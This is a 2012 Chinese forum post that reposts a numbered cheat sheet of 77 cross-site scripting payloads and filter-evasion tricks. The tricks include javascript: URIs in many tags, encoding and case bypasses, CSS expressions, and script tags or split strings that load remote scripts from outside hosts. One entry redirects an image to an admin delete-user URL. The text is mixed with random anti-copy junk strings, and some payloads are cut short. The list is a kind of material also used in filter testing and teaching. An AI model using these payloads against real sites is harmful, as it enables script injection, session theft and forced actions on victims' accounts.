找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3569|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
  f- G, F! m2 i$ E7 S) ?
: G$ l( q' w' R& i% B (1)普通的XSS JavaScript注入, V' M$ w6 ]* p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" A3 \: \/ ?( t$ f( H
7 |1 _' J& d% \4 d/ h, I$ { (2)IMG标签XSS使用JavaScript命令
$ }8 q- C3 f; p* X, A5 ? <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ @5 J8 }  c( }& ?3 r) a' q8 y

) M2 u; S0 C) {4 e. z3 L" `. |, [ (3)IMG标签无分号无引号" l% n) ?! I: B8 s! M
<IMG SRC=javascript:alert(‘XSS’)>
; C8 E9 W# L& C% B& G! P! @* M8 X5 t8 B. M, C# ?+ _
(4)IMG标签大小写不敏感
4 ~! w3 l$ w+ ]0 F. z7 ^; y  {7 p) Z <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 o' H) r3 h$ I4 Z* Y9 y+ ^1 f6 W! [
(5)HTML编码(必须有分号)- C* r0 m' L- R: b
<IMG SRC=javascript:alert(“XSS”)>
# L3 s9 G2 C  N, J  L5 a& F+ w
: B6 H$ ]. D( x$ C+ ]7 E3 A; B) B (6)修正缺陷IMG标签
) W, F/ ~! W7 u3 L <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# Y5 Z1 u! P8 J) x+ d( v' M1 Z2 Y/ ], X0 e
(7)formCharCode标签(计算器)% v4 f+ f! C, r$ D! K! |. Z
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
3 M4 j2 {" G" F3 O7 |1 s3 E# }7 e2 I# J9 \0 @5 R4 F- E
(8)UTF-8的Unicode编码(计算器)9 x8 w: A& P0 T1 @
<IMG SRC=jav..省略..S')>% V" b. @" R8 C9 T
# J& U- ]# @& d" b, U5 Y9 V, M
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 v2 V4 U$ l# K3 |6 a0 y. W1 r
<IMG SRC=jav..省略..S')>
" f0 y6 k" k0 }/ Z- F% |+ W+ M' s; O3 ^% k0 B
(10)十六进制编码也是没有分号(计算器): r" a6 h% w2 x, W- ~, w  @* P2 K  U
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>; u- c( s; B0 b3 R4 a

2 P% f" g" F5 k, U  @. h+ {. S) T, N3 _ (11)嵌入式标签,将Javascript分开
& _" K6 m8 ^7 ^! w' m! [8 D <IMG SRC=”jav ascript:alert(‘XSS’);”>
# ^0 ^! L; S7 f0 r8 m4 H4 D
9 N# c% S0 m; M) M (12)嵌入式编码标签,将Javascript分开/ l, P+ c. {1 \8 F9 _
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 E$ b1 ?6 M2 D3 U; Z

, G9 V1 @  G) f: u: E4 A8 q; t( z) m (13)嵌入式换行符
1 K/ G1 j+ f8 `' \; [0 @$ d" e% A# M <IMG SRC=”jav ascript:alert(‘XSS’);”>4 D- }6 E% w& L( {0 u

3 O/ A# ^( {$ P (14)嵌入式回车
' X9 u9 V7 r* a: ^ <IMG SRC=”jav ascript:alert(‘XSS’);”>% a* \; o( A3 ~4 V& ~; B# r

! {7 N) K- \0 f (15)嵌入式多行注入JavaScript,这是XSS极端的例子
" O7 r* f/ O: R; |; A8 l. Y/ ~  e <IMG SRC=”javascript:alert(‘XSS‘)”>2 w( Z2 M2 [- c! \$ w6 q
' W8 A0 e" m) S3 U
(16)解决限制字符(要求同页面)+ `, X3 Z" o! h' T/ x
<script>z=’document.’</script>7 ]5 p! U; S: @
<script>z=z+’write(“‘</script>
0 p4 G" v3 X/ T- w' p; I <script>z=z+’<script’</script>
$ B$ m0 H+ W/ f5 I4 Q1 t <script>z=z+’ src=ht’</script>8 p- |6 q6 n& C& s$ q
<script>z=z+’tp://ww’</script>
% @2 g* n' G4 H$ H3 S: x <script>z=z+’w.shell’</script>* i. Z, l5 n9 y. Z2 L, p
<script>z=z+’.net/1.’</script>
( @/ J: e6 L: u( f <script>z=z+’js></sc’</script>+ @( n6 L% i  t6 r* R2 g8 |
<script>z=z+’ript>”)’</script>1 _, z0 ^0 F! x
<script>eval_r(z)</script>
( y; }2 R$ R6 \$ e% n% ]. b, g2 r# b# d7 e$ u3 A8 T. [
(17)空字符
1 o3 `) q$ u" v( L6 q( F& P perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' m" O9 c* J( n3 q# Z; C6 g- P$ ]
( r, _' F( I! v& S) Z (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 D5 Z7 W% B9 o+ @  k perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out( O' @9 q) o* y) O/ b8 C

- H: a, T- Q& T$ O (19)Spaces和meta前的IMG标签
7 ^; g3 @; v% @" { <IMG SRC=”   javascript:alert(‘XSS’);”>
& c- Y% P( C8 @) I
. \0 x5 ~  x; i* @2 {" Q* i (20)Non-alpha-non-digit XSS3 _( w* s7 |) t
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ ?. I0 j# u8 s& _% o$ P" m7 a7 O, W% s" i, v8 V
(21)Non-alpha-non-digit XSS to 2
/ @9 `! ~9 ?6 E <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: r* j- [3 O, @: Q0 c! T. ~4 e+ }
1 f: q: |" m+ Q1 n! k- e" [. R6 s, M (22)Non-alpha-non-digit XSS to 3
1 a# v( t7 E0 { <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: H6 n$ r+ Y9 a* L7 K" p; d0 t7 I8 f. {9 ~' W& c
(23)双开括号
% f  t9 f& Q, ~/ `, O <<SCRIPT>alert(“XSS”);//<</SCRIPT>, V" ^0 x3 t/ @: U" Z4 Q. a2 T
0 P$ w$ [3 p) o& E% J2 J+ u' h
(24)无结束脚本标记(仅火狐等浏览器)9 o% M3 S7 T0 b3 p, F$ U! c
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ Y# i% z& J. l' Y. H  E
: Y* ]6 H# [- G) M* i, I) I
(25)无结束脚本标记2
' o' }1 b% r- p" O8 i <SCRIPT SRC=//3w.org/XSS/xss.js>
. f4 Q# L% d4 m) j! f# X: P
) u1 l/ g6 Z, Z0 e (26)半开的HTML/JavaScript XSS; }/ l: x1 y' `+ e0 {+ l
<IMG SRC=”javascript:alert(‘XSS’)”7 U7 W  z' {/ n0 P3 q, G
+ l  n5 M/ ^. A/ f1 n* y0 A
(27)双开角括号
4 w3 ^+ ?3 d) {: z <iframe src=http://3w.org/XSS.html <
( ~2 f* [: d8 Y. n$ `! ?8 x- K8 I5 @# u. P
(28)无单引号 双引号 分号
( ]  T8 e* H4 u7 R <SCRIPT>a=/XSS/
6 \/ s$ t% E* z  C alert(a.source)</SCRIPT>
9 V9 {. {; X7 W0 ~& L6 s. Y! C5 w# {' J( |  ^- n, S
(29)换码过滤的JavaScript
; }& s3 R9 w$ s0 |3 k* P \”;alert(‘XSS’);//
4 n0 u4 O" R' @$ l( ~* j; q$ v  H, X, b& F% Z
(30)结束Title标签
# U3 c/ W( c& F+ t7 u5 t, K </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 Z4 q4 k. B8 y  t; [, d; p8 B# u2 M9 k
(31)Input Image
; ]/ Z1 s1 \$ Y <INPUT SRC=”javascript:alert(‘XSS’);”>
3 N, K7 |- _$ T9 u" m9 q# z: g
% _( i  \- q8 y% D  c+ y (32)BODY Image
4 y' o$ C7 M7 U0 N5 W <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 i" M- {( ?- B2 k' g5 J$ B, B% d, w/ T. ^, e4 T. ]/ T0 N
(33)BODY标签
3 s% h9 C' t. q8 X( u. c8 ^6 \ <BODY(‘XSS’)>% ~/ Y% p# ?; Z  b
. s/ U  d( s3 D8 f6 d
(34)IMG Dynsrc
- J' v0 u4 c9 z0 [5 r) b. m: f2 \  k <IMG DYNSRC=”javascript:alert(‘XSS’)”>. S2 t7 k2 l3 s. w, R& }

3 l) F* t6 R$ _' I1 P4 { (35)IMG Lowsrc
% k; X4 d0 t  l% p <IMG LOWSRC=”javascript:alert(‘XSS’)”>  ?. }; x. x. U1 f' W0 c2 j7 m
8 H) w6 h3 p; M4 Q1 c5 p: {8 }
(36)BGSOUND9 I: H) u, i, C
<BGSOUND SRC=”javascript:alert(‘XSS’);”>; l2 w9 H; C! P; t2 k% A
: M9 k: A, P0 O7 Y. \9 F
(37)STYLE sheet
) O" F0 ?) G3 }% N( [3 o1 Z+ J2 r <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
6 b. A2 n2 b5 B$ b5 j" w* v" N  e& _" ^  Z8 M/ Y
(38)远程样式表$ W$ A4 B& I( _
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>1 U. d2 J. n) B7 L

4 s$ A' P: J; k6 | (39)List-style-image(列表式)
2 I* {+ `* b2 i" b' d! B <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
8 K: V/ f5 d, j4 i5 {
3 B% ?/ O; U8 |( Z: R" ^+ A (40)IMG VBscript
, k8 U) T; i* {1 G' P: o& B* D6 C& d <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 e& y9 q7 P  F: D, K! r  l1 r* p' @- S3 e- x+ v4 ]6 A
(41)META链接url
( q% }( m" h) i" q( C! R <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 Z( F: g+ T! @( s  Y% H/ Y/ D2 C& h% ^) ^( `) n
(42)Iframe
% ]  F+ r  f4 h. U% v' [2 R <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
1 ?  S: ]$ N$ f! u, _2 |
0 Y& l/ ?: n% I- f (43)Frame7 _, n& ]; }) B" M! V
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
" I5 G" s1 ?: I5 J) J% s
0 D0 X5 ]+ z6 E1 X" _ (44)Table4 K; g5 I  c$ U7 C
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* A+ K7 N( X% b! H
* l6 C2 J3 K1 w* o; h9 G1 w' @ (45)TD
3 s1 p: u) U$ E <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, _  D9 J& Y+ C

0 {! C0 Y, \3 ?6 w" C( f (46)DIV background-image
$ t: w" |' A3 D& T9 E <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
9 e0 K& I+ B4 z. u) C* B5 h% s) S( \. z' P4 t4 A5 z
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
1 B7 h$ Y: g9 @0 u* b' y. C <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" E2 |; m0 o) h; X! n: O+ Z, z

/ [# [5 c2 w8 o) ^ (48)DIV expression
& Q( b3 y1 \" Y7 y <DIV STYLE=”width: expression_r(alert(‘XSS’));”>( e8 P6 X0 G3 M! g7 O! E& S' N) y- y& n
$ I) @9 q$ ?5 Q7 `
(49)STYLE属性分拆表达0 ~3 `4 G: e* w$ l# U* d
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
0 z( ]7 w, Z: `9 X) N4 d  M8 Z3 ?0 {9 b# n
(50)匿名STYLE(组成:开角号和一个字母开头)+ |7 z9 m. A, N1 m  Q9 y) h; H
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' C, J6 d' j5 o- H% X8 V0 Y4 U# m8 f( N3 w$ H2 N
(51)STYLE background-image
6 K; |# j1 ]- b4 g$ J; v <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- q$ a5 ?+ R/ K& ]3 E1 {" S( F% i0 P' d( p; o0 H+ g8 z+ _
(52)IMG STYLE方式7 A3 U" V) J( y2 ^' W8 P
exppression(alert(“XSS”))’>+ E4 W9 `+ l  M2 T
& U6 v/ e# l- v3 C
(53)STYLE background  Z" l/ W8 W$ x9 L) `2 Q) l! @
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 z, I; W2 ~( a( d# O: ]2 L" U# U9 e( d1 f4 B$ B
(54)BASE
2 g1 ^* O( Q+ K$ I1 I! I8 f* A <BASE HREF=”javascript:alert(‘XSS’);//”>
  F; b; y" Y" C1 M' w* v
/ p# h: I; S* B% i8 w (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' M! o5 y% X# E9 S4 W7 ]5 j4 g
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( n) \; n; U4 T/ `+ B1 e/ k4 O! K5 E, ^! c% t$ J( P4 c+ y2 r
(56)在flash中使用ActionScrpt可以混进你XSS的代码
; T& g0 o, e2 e8 d! b. b% Q, V a=”get”;* F5 a' w1 {  m3 @
b=”URL(\”";( k$ v6 G- R7 Z5 ]( I  d( C6 f
c=”javascript:”;
) ^, }- c: A$ {& Y% _ d=”alert(‘XSS’);\”)”;
8 n1 M  _0 }; `) {, a. h eval_r(a+b+c+d);
) Y+ t& F7 |3 g7 z" O0 z! r0 G8 K/ G0 R
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. K8 B+ ]& t& f <HTML xmlns:xss>
' ?8 v* g/ {7 \/ x# E( S <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>& `. I2 q0 e$ _
<xss:xss>XSS</xss:xss>
  y  T2 A3 ?. M4 v) ^, ~. ] </HTML>7 j6 L5 h. S( e" ^0 {; s4 j
8 v' l' E+ r; v4 Q+ R0 @
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ V3 q/ `* w# w
<SCRIPT SRC=””></SCRIPT>
9 W& o, }; R- e: c0 x$ ~8 B2 I" B/ {8 n
(59)IMG嵌入式命令,可执行任意命令
6 U! G- q" B+ M7 }# g' g <IMG SRC=”http://www.XXX.com/a.php?a=b”>
1 j2 u( ?- c- q7 b
: {8 c7 n; h8 O# p6 \ (60)IMG嵌入式命令(a.jpg在同服务器)  x5 K5 X. C  f% O! U5 l4 x
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
, n+ f$ S* C) a" n7 q& i7 |9 ^( {$ }3 T3 [/ G
(61)绕符号过滤
, b7 ^7 R9 K1 h1 L <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* c( G, y6 t6 g: p* f6 ^2 l0 S" V% y) m0 k; i
(62)0 c+ C: ]4 v) z" Y/ {0 a
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 k7 r8 [, B6 D0 _7 H$ I' k+ {  h, [
8 C) g, [1 D" C- J
(63)
+ {% S! a" @# T7 G <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 z" M$ `3 o! I8 s6 ?% v

/ K* g5 ~0 b+ F; Q& e; V (64)
1 O; A7 t( w. | <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>* J; G) G7 m4 m" V

3 w2 I- T# \) ]1 y) N! X (65)
- Q; D$ \! l, s4 f) k <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
' P- \# Z4 |$ t! F' L7 J: n0 @5 @+ A0 R# x
(66)
9 a- j% B$ b4 O; V9 D <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
# m" I. p+ f1 x" e0 ~  j/ I% t, _, I, G/ Y
(67)
7 O; v5 P+ [  J <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>! A$ S) G+ d, `2 `$ _

" e8 w" |7 s' o& v7 R. {9 H1 e0 I! d (68)URL绕行0 d( Z1 N. B% v0 ]- d" P
<A HREF=”http://127.0.0.1/”>XSS</A>+ F) m. E/ {) D: M% i1 T
8 Y3 Y/ z6 `* i) a0 G. Y8 H: R* ]
(69)URL编码. B8 f' z$ E; J% w
<A HREF=”http://3w.org”>XSS</A>
# x1 U: B  f! a% Y* o  g0 T9 d' R  o, Z$ M
(70)IP十进制
6 e. ~- H/ @5 y% x! A <A HREF=”http://3232235521″>XSS</A>
+ v9 t- E% I8 x
2 q' {$ l9 x! r) q9 F (71)IP十六进制* I$ l: t& r; \( z9 L# K; g5 C
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
, Q* s0 ]+ E- Q* D! U. ]! t( [4 b! {- Q( x& s/ g
(72)IP八进制8 q$ k0 |& ^" `
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
) ~- n  O' j# N) e: U& h8 c# }: D) z8 j3 L* `) V; h
(73)混合编码
) v" b! G- h% M0 V' R <A HREF=”h
. P1 @- k* B' ^ tt p://6 6.000146.0×7.147/”">XSS</A>+ N7 `) t# @& g+ S, \; _! V8 J5 o4 f
8 @, S0 a% k3 K) W
(74)节省[http:]1 ]/ y" y3 a, N, m
<A HREF=”//www.google.com/”>XSS</A>
6 |: r; y$ T3 q4 b2 ?1 f1 W% g9 D' h, w9 g* r
(75)节省[www]
$ q5 @3 q" C# ^6 q% u$ ? <A HREF=”http://google.com/”>XSS</A>3 l! a" N3 T* z' @0 h! G8 h: v
6 A) k" x- f: S7 |4 T) h
(76)绝对点绝对DNS
7 [7 _; [& @6 [0 x$ i <A HREF=”http://www.google.com./”>XSS</A>
2 [- w0 Z. M/ E7 P7 J$ d
1 {# F1 \+ h. Z3 B9 [: B (77)javascript链接7 `9 }' H& \& }
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表